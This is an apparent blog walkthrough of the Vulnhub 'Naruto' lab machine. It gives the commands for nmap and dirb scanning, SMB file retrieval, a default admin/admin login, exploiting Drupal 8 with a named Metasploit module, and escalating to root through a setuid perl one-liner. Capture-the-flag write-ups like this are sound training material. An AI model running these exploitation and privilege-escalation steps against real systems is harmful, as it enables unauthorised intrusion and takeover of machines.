Vulnhub Naruto Walkthrough

Using nmap-A –T4 –p- 192.168.1.13 –vv

Running dirb :

As we can see in nmap scan, port 139 and 445 are open so let’s exploit them:

Let’s connect to smb service using smbclient \\\\192.168.1.13\\naruto:

Now we download the text file, we use: get uzumaki.txt

Well with some luck I tried different names as path and the one that worked out is gara, and I can log in as admin and password also admin.

Now the host is using Drupal 8 as we can see:

Searching searchsploit for Drupal 8 came with :

So now we going to use metasploit and search for drupal unserialize : use exploit/unix/webapp/drupal_restws_unserialize

And we have a shell, lets break out of it by python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Changed directory to home and found two users narato and yashika , the user yashika has a file perl, which we can use it to escalate our privilege to root.

Simply we can type ./perl -e ‘use POSIX (setuid); POSIX::setuid(0); exec “/bin/bash”;’

And then if you id you can see you are root, navigate to the root directory and read the final.txt file and you are done

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s